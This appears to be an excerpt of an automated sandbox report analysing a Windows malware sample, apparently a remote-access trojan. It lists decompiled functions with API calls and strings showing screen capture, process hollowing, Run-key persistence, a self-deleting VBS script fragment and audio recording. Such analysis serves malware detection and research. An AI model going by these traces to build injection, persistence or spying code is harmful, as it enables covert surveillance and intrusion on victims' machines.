                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                                                                            • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                            Function 0044E93E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                            • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                                                                            • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                                                                                                                                                            Function 00417FAF Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                                                                                                                                              • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                                                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                                                                                                                                            • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                                                                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                                                                                                                                            • String ID: DISPLAY
                                                                                                                                                                                                                                            • API String ID: 1765752176-865373369
                                                                                                                                                                                                                                            • Opcode ID: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                                                                                                                                                                                                            • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                                                                                                                                                            Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                            • API String ID: 4188446516-3035715614
                                                                                                                                                                                                                                            • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                            • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                                                                                                                                                                                                            Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                                                              • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                                                                                                                                                                                                              • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                                                                                                                                                                                                              • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                                                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                                                                                                                                                            • Opcode ID: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
                                                                                                                                                                                                                                            • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                                                                            Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                                                                            • API String ID: 3797177996-1998216422
                                                                                                                                                                                                                                            • Opcode ID: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
                                                                                                                                                                                                                                            • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                                                                                                                                                                                                            Function 0041A1CB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                                                                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                                                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                                                                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                                                                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                                                                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                                                                                                                                            • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                                                                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                                                                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                                                                            • API String ID: 738084811-1408154895
                                                                                                                                                                                                                                            • Opcode ID: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                                                                            • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                                                                                                                                            Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Write$Create
                                                                                                                                                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                                                                                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                                                                            Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000001,004068B2,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                                                            • API String ID: 1646373207-4179007786
                                                                                                                                                                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                                                                            Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                                                                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                                                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                                                                                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                                                                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041B323
